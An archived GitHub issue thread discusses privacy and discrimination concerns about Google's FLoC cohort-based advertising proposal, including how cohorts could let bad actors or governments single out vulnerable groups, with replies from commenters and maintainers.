Skip to content
This repository has been archived by the owner on Mar 16, 2023. It is now read-only.

General concerns about FLoC-powered abuse #36

Closed
BasileLeparmentier opened this issue Jan 8, 2021 · 13 comments
Closed

General concerns about FLoC-powered abuse #36

BasileLeparmentier opened this issue Jan 8, 2021 · 13 comments

Comments

@BasileLeparmentier
Copy link

We have some significant concerns about the long-term viability of FLoC due to some social consequences it might have.
Indeed, in FLoC, the user agent (Chrome browser) is the sole responsible to assign people "with similar interest (or behaviour)" into one cohort. This is a huge responsibility, and potentially one that could lead to some unintended, but very real societal consequences.

Let me give describe what I think is a likely bad usage of FLoC:

Let us consider an "attacker" who wants to harm a specific group (for instance, because of race, religion, sexual orientation, political views, etc). Some members of this group will likely share a FLoC, as it is FLoC's purpose to group user of similar interest based on their browsing history. The attacker can easily emulate the internet browsing history of a member of the group he is willing to harm and see the FLoC he/she has been added to. The "attacker" can then target this FLoC ID in any specific way they wish, even though they don't have access to any specific user. Would they want to get access to any specific user, the attacker would "just" need to get it via to a website with a PII browsed by anyone with the same FLoC ID.

This might look far fetched, but similar "artisanal" cases have already been used, for instance here https://www.pinknews.co.uk/2015/02/18/gay-dating-apps-used-by-attackers-to-trap-victims-in-ireland/

So it already exist today, in some form. But thing is, Chrome will have done all the heavy lifting to make such attacks work "at scale". Being part of the group, instead of shielding the user from potential harms, actually put a target on its back.

This makes this kind of attack significantly easier than with third-party cookies (you need either to drop directly a cookie on the group's website), and you benefit from added Chrome's intelligence to do so, as Chrome groups users together and give the FLoC IDs out to everyone.

Yes, the aforementioned threat could be reduced, but not eliminated. For example, as you proposed, not taking into account websites flagged as related in some way to marginalized communities could work on paper. But it is going to be extremely hard to set up in practice on an ever-changing web. As you stated in #27, it is possible to have bias even from a seemingly unbiased signal. Web browsing history represents the user's interests and therefore is by nature biased toward peoples' interest (and this includes groups suffering prejudices, or susceptible to be the target of malevolent actors). The web is extremely wide and diverse, and the chance that is no way that no remote part of it falls through the cracks, especially in countries and cultures unfamiliar to Chrome engineers, where endangered groups might wildly differ from the Western Hemisphere in general, and United States in particular.

Another point of contention of removing such groups is that it is discriminatory for businesses with legitimate interests, and people targeted by these businesses. For example, a FLoC of straight newlywed people will have a FLoC allowing for personalization and monetization for business targeting them, but the same business, specialized for LGBTQ+ (if they were to be filtered out for the sake of sensitivity) would not have any mean to do targeted advertising and therefore expand their business fairly compared to non-LGBTQ+ businesses!

I really believe that if FLoC happens, then seeing the examples such as those I listed above is not a matter of "what if", but "when". As such, it could seriously jam the long term prospect of FLoC as an accepted marketing framework.

Could you please let us know what elements would be put in place to shield FLoC from such risk and ensure its persistence in the long term?

@Chaz6
Copy link

Chaz6 commented Jan 26, 2021

I have been an internet user for over 20 years and I strongly reject FLoC in its entirety.

@inoas
Copy link

inoas commented Mar 3, 2021

Today state news in germany cited techcrunch without doubting anything that floc will be the solution to the ad-industry-vs-privacy issue.

Vom kommenden Jahr an will Google seinen werbetreibenden Kunden Profile von Nutzergruppen anbieten. Heißt: Es teilt seine User in Kategorien auf. Eine Gruppe, die sich zum Beispiel für Fitnessprodukte interessiert; eine andere, die gerne Urlaub in der Karibik macht. Im Umkehrschluss bedeutet das: Einzelne Nutzer könnten nicht mehr gezielt von maßgeschneiderter Werbung adressiert werden - nur noch Gruppen von Gleichgesinnten.

https://www.tagesschau.de/wirtschaft/unternehmen/google-stoppt-personalisierte-werbung-101.html

But well in reality this will create bias'ed groups, discriminate against poor, create filter bubbles of ads and allow targeting of those who are deemed worthy for specific discounts. Price discrimination is a strong tool to increase profits and require customers to pay more than they need to. This already happens if you surf websites on apple products for instance. Floc seems to do the same, just on steroids.

@DarrienG
Copy link

DarrienG commented Mar 5, 2021

I agree, FLOC is honestly one of the worst ideas to semi-recently come out. The idea that it is somehow better for privacy is just insane.

It would be better for privacy if interest-based advertising could be accomplished without needing to collect a particular individual’s browsing history.

It is simply another way to collect data from users. It doesn't stop anyone from doing anything they were doing before, it just provides another incredibly powerful avenue for collecting data.

If it were to become implemented, it would become a terribly dangerous precedent for the web. Advertisers already have too much power, there is no need to provide them with any more power.

@Sora2455
Copy link

Sora2455 commented Mar 6, 2021

The problem for me is that as long as there exist browsers that don't implement FLOC (and I can't see it ever becoming universal) then ad companies will need to retain their current tracking techniques to maintain the information gathering they rely on. And as long as they're doing that, FLOC will be added to their tracking, not replacing it. Thus reducing privacy, not adding to it.

@dmarti
Copy link
Contributor

dmarti commented Mar 8, 2021

@Sora2455 I have no doubt that at least some countries will mandate a FLoC-enabled browser. It's not useful for surveilling individuals by itself, but a evil dictator on a budget could use FLoC to

  • prioritize assignment of surveillance personnel to individuals
  • allocate public services preferentially to favored religious and language groups
  • encourage self-reeducation by members of marginal groups

FLoC is a complement to other surveillance technologies. FLoC cohorts do not eliminate the need for costly, manual surveillance of a subset of citizens, just as a vehicle license plate does not eliminate the need for random checks of a driver’s papers. However, license plates and cohorts are easily observable in large numbers, and appropriate penalties for falsification of either can be applied.

@Sora2455
Copy link

Sora2455 commented Mar 8, 2021

@dmarti I... fail to see how "It's great for evil dictators on a budget!" is supposed to make me feel better about this technology.

@dmarti
Copy link
Contributor

dmarti commented Mar 11, 2021

W3C TAG review: w3ctag/design-reviews#601

@michaelkleber
Copy link
Collaborator

Please see https://docs.google.com/viewer?a=v&pid=sites&srcid=Y2hyb21pdW0ub3JnfGRldnxneDo1Mzg4MjYzOWI2MzU2NDgw

@DarrienG
Copy link

DarrienG commented Apr 1, 2021

Sensitivity of data is not my concern, giving my general browsing interests based on my browsing history to any implementers is the problem. Whether FLoC users know if I am looking up pasta dishes or rifle models, it is more than they should know. Google deciding what is and isn't sensitive doesn't fill me with hope either.

At best companies should know these things in their own domains and nowhere else. FLoC's expansion of power for advertising companies (and anyone else who uses the data) across the web is the problem. The shared doc does not address any of these concerns. This issue should not be closed.

@michaelkleber
Copy link
Collaborator

@DarrienG Perhaps you're supporting the position discussed in #76? I think what you are expressing is different from what @BasileLeparmentier was talking about when he created this issue.

@DarrienG
Copy link

DarrienG commented Apr 1, 2021

I'll move my complaints over there then. Cheers

@inoas
Copy link

inoas commented Apr 3, 2021

@dmarti I... fail to see how "It's great for evil dictators on a budget!" is supposed to make me feel better about this technology.

I don't think the comment was meant to feel anyone better.

The potential for absuing this - say in hong kong - is mind blowing bad.

@inoas
Copy link

inoas commented Apr 3, 2021

Please see https://docs.google.com/viewer?a=v&pid=sites&srcid=Y2hyb21pdW0ub3JnfGRldnxneDo1Mzg4MjYzOWI2MzU2NDgw

@michaelkleber Where are the sociologists and other absolvents of humanities on your team?

So you are creating a new tracking technology in a team of 2 mathematicans and 2 software engineers, that has the potential to change the world (maybe for better, but for certain also for the worse).

Sounds sane to only have math and tech guys on the team - right?

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

7 participants